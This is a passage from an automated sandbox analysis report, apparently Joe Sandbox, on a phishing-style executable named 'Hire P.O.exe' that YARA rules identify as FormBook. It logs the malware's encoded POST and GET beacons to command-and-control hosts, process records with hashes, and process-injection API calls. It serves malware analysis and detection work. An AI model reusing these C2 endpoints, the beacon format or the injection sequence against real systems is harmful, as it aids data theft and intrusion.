                                                          21 | 192.168.2.11 | 50002 | 167.172.133.32 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:24.637320995 CET | 594 | OUT | POST /jlqg/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.omnibizlux.biz
                                                          Origin: http://www.omnibizlux.biz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.omnibizlux.biz/jlqg/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=xbYOED3XuvIwe8AZfGfonhZcC4k4T9sJ34VEgAVQ/XqydcVjoKRgErFp1/Shb7hJPJTBhh+/VAcmq1FClbNwt6+VpGHVWvzrSYE7NDoCnCw7swpZchpEkzwagwzLCVkpIraM61y/t1Z9HgxkoBsK/ufWt7vQ4G+hrNwdlfBwSXWV0QJhB6ta4UijOz/oSstkUg==
                                                          Nov 15, 2024 09:33:25.284940958 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.11 | 50003 | 167.172.133.32 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:27.180752993 CET | 614 | OUT | POST /jlqg/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.omnibizlux.biz
                                                          Origin: http://www.omnibizlux.biz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.omnibizlux.biz/jlqg/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FOyc9ljpOlgHrFp9fSkUbh4PIvJhhS/VEMmq1VCkpl3iK+timHbSvzrSYE7NAUsnC47sgZZdDBDqTwZtgzLGVluIrbb60uGt2h9Hk1koQsLkefUwruVw1fYgvRmr5ZjW3KT42E7RZkN7HqhaVeYbdItPnaLe/7cWi/P9lVbPbUKQVA=
                                                          Nov 15, 2024 09:33:27.864753008 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:27 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.11 | 50004 | 167.172.133.32 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:29.743107080 CET | 1627 | OUT | POST /jlqg/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.omnibizlux.biz
                                                          Origin: http://www.omnibizlux.biz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.omnibizlux.biz/jlqg/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:30.422269106 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:30 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.11 | 50005 | 167.172.133.32 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:32.284755945 CET | 326 | OUT | GET /jlqg/?Ht=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1snIy3rHn2YPrXd4E8Hi4h+GYhtHJoWRtIl2c=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.omnibizlux.biz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:32.941217899 CET | 303 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:32 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 153
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.11 | 50006 | 162.0.211.143 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:38.051337957 CET | 585 | OUT | POST /4xim/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.vibixx.site
                                                          Origin: http://www.vibixx.site
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.vibixx.site/4xim/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=5YUvImuIBxffNKB1ee26mhvaLKaRyF0KE74Ebhgkc5/zfSrP1y9eKTRiRl4SdVN8BcAO9Vo7KbJ4FHE+R7Ta58jGAIxcOTJlnVpEgL8g+HGEoIn7EuYngK0sECWAniiFMq+sa8Z03/dKNvUk6tW86+ahSnafB6nf/gTRA/DJ9OX6YrG8iK4oIDPKwMvp7032pA==
                                                          Nov 15, 2024 09:33:38.725321054 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:38 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.11 | 50007 | 162.0.211.143 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:40.598639965 CET | 605 | OUT | POST /4xim/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.vibixx.site
                                                          Origin: http://www.vibixx.site
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.vibixx.site/4xim/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbbzfzbP22JeHzRieF4XZVNiBc889R07KfZ4FG0+RI7d/sjEIoxeKTJlnVpEgLZ7+HOEo4X7EMwktq0tHCWAtCjOMq/La9Fe38lKNukk6cW/w+ajfHb+A6yX0na9AMf0+d6CQNLmypx/LQHIkqOZyFS/yLCEiJFWZKR8PQZVebbDwzI=
                                                          Nov 15, 2024 09:33:41.270337105 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:41 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.11 | 50008 | 162.0.211.143 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:43.149660110 CET | 1618 | OUT | POST /4xim/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.vibixx.site
                                                          Origin: http://www.vibixx.site
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.vibixx.site/4xim/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:43.809772015 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:43 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.11 | 50009 | 162.0.211.143 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:45.690406084 CET | 323 | OUT | GET /4xim/?Ht=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP2+eiOObBwEQMzrW97hoYkmxyo0/quMuclnrI=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.vibixx.site
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:46.350785017 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:46 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Target ID:1
                                                          Start time:03:30:41
                                                          Start date:15/11/2024
                                                          Path:C:\Users\user\Desktop\Hire P.O.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Hire P.O.exe"
                                                          Imagebase:0x500000
                                                          File size:807'936 bytes
                                                          MD5 hash:838E3079ECEA7CBF8D6909ABE0D6F393
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:03:31:05
                                                          Start date:15/11/2024
                                                          Path:C:\Users\user\Desktop\Hire P.O.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Hire P.O.exe"
                                                          Imagebase:0x540000
                                                          File size:807'936 bytes
                                                          MD5 hash:838E3079ECEA7CBF8D6909ABE0D6F393
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:03:31:31
                                                          Start date:15/11/2024
                                                          Path:C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe"
                                                          Imagebase:0x2c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:03:31:33
                                                          Start date:15/11/2024
                                                          Path:C:\Windows\SysWOW64\fc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                          Imagebase:0x7ff68cce0000
                                                          File size:22'528 bytes
                                                          MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:03:31:47
                                                          Start date:15/11/2024
                                                          Path:C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe"
                                                          Imagebase:0x2c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:12
                                                          Start time:03:32:04
                                                          Start date:15/11/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff6de060000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:12.5%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:1.2%
                                                            Total number of Nodes:254
                                                            Total number of Limit Nodes:13
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4|dq$4|dq$$_q
                                                            • API String ID: 0-1079538806
                                                            • Opcode ID: da32797d67e569f8d7dbbbc6bf7b5024301b79502c7d366f8f37b4bbc7a28a6d
                                                            • Instruction ID: 0f0093ba2f71355bb8e9cdfba2b0706364dfaf61baf5320efbe5804e9665af58
                                                            • Opcode Fuzzy Hash: da32797d67e569f8d7dbbbc6bf7b5024301b79502c7d366f8f37b4bbc7a28a6d
                                                            • Instruction Fuzzy Hash: 58631A74A00219CFCB24DF68C988A9DBBB2FF49321F15859AD419AB361DB30ED91CF51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ceea2b0d295188ebcd53f1dce052b743bf30137d56d3fe18cffc3e15bb7d0d91
                                                            • Instruction ID: 7176351c21a5e18843832255810328845d76b8fc824c02dcd57e071cfb6c295b
                                                            • Opcode Fuzzy Hash: ceea2b0d295188ebcd53f1dce052b743bf30137d56d3fe18cffc3e15bb7d0d91
                                                            • Instruction Fuzzy Hash: 5E2274387012148FDB58DB69C860BAEB7F7AF88301F244469E546DB7A1CB34ED46CB51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0a3cafd9f936253c9ab56f662c6bbc90309190ac7e13839114a90ff998b0cd2
                                                            • Instruction ID: b6ebc784d1d952e2a609f622f748bddf2ae64d84bd5e6f959ba8197b3fc85eda
                                                            • Opcode Fuzzy Hash: a0a3cafd9f936253c9ab56f662c6bbc90309190ac7e13839114a90ff998b0cd2
                                                            • Instruction Fuzzy Hash: 1851C874E012199FDB08DFA9D955AEEBBF2FF88300F148469D408AB268DB305846CF50
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o_q$(o_q$,cq$,cq$Hcq
                                                            • API String ID: 0-4110691418

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'_q$:$pcq$~
                                                            • API String ID: 0-1589365477

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o_q$,cq
                                                            • API String ID: 0-3128450471

                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0880975E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0

                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0880975E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0282B37E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0

                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F11E02
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0

                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F11E02
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F14381
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 028259C9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 028259C9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08808EF8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08808FD8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08808EF8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0282D5CE,?,?,?,?,?), ref: 0282D68F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08808D4E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0282D5CE,?,?,?,?,?), ref: 0282D68F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08808D4E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
